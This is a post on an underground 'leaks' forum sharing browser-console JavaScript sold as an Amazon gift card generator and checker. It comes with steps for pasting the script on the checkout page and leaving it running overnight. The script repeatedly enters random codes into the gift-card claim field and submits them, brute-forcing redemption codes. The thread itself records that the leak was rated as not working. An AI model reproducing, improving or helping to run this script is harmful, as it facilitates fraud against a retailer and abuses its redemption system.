Holisticz - Embrace the Infinite

Step into the world of endless opportunities and unlock the gateway to virtual transactions.

  • Domain Update: Our Forum has moved! Please visit us at Holisticz.com for the latest updates.

[SOURCE CODE] AMAZON GIFTCARD GENERATOR + CHECKER [UPDATED]

DankoFR

Divine
Divine Contributor Elite member Premium

0

0%

Status

Offline

Posts

1,690

Likes

2,992

Rep

325

1

Years of Service

Don't have an account? No worries! Click me to register so you could reply to this thread! (And view its content)
Register Today
[Image: K8N5F.png]

Like the Thread for More Leaks!


[HIDE]
Steps:[/HIDE]
  • 1. Login into your account
  • 2. Add any item to the cart (Value doesn't matter)
  • 3.Proceed to the payout page (Do not order it though
  • 4. Press on add/use gift card button
  • 5. Open the console of the navigator and paste the code below
  • 6. Select 2,000 if your PC could handle a lot of threading, if not, select 3,000 (Better do it on an RDP so you could leave it running overnight
Code:
var speed = prompt("Type 2,000 if your PC is fast, 3000 for a slow pc");

function Letter() {
var code = "";
var chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZ";
for (var i = 0; i < 1; i++)
code +=
chars.charAt(Math.floor(Math.random() * chars.length));
return code;
}

function Number() {
var code = "";
var chars = "0123456789";
for (var i = 0; i < 1; i++)
code +=
chars.charAt(Math.floor(Math.random() * chars.length));
return code;
}

function Random() {
var code = "";
var chars = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ";
for (var i = 0; i < 1; i++)
code +=
chars.charAt(Math.floor(Math.random() * chars.length));
return code;
}

function main() {

document.getElementsByName("ppw-claimCode")[0].value =
Letter() +Letter() +Letter() +Letter() +"-" +
Letter() +Letter() +Letter() +Letter() +Letter() +Letter() +"-" +
Letter() +Letter() +Letter() +Random();
//EDIT THIS TOP LINE FOR A CUSTOM PATTERN BY REPLACING Random() FOR Letter() OR Number()

document.getElementsByName("ppw-claimCodeApplyPressed")[0].click();
}
setInterval(function () {
main();
}, speed);

This leak has been rated as not working 1 times this month. (2 times in total)
 

MatDev

Active member

0

0%

Status

Offline

Posts

82

Likes

0

Rep

0

Bits

0

3

Years of Service

[font][font]hello[/font][/font]
 

48,610

38,214

238,323

Top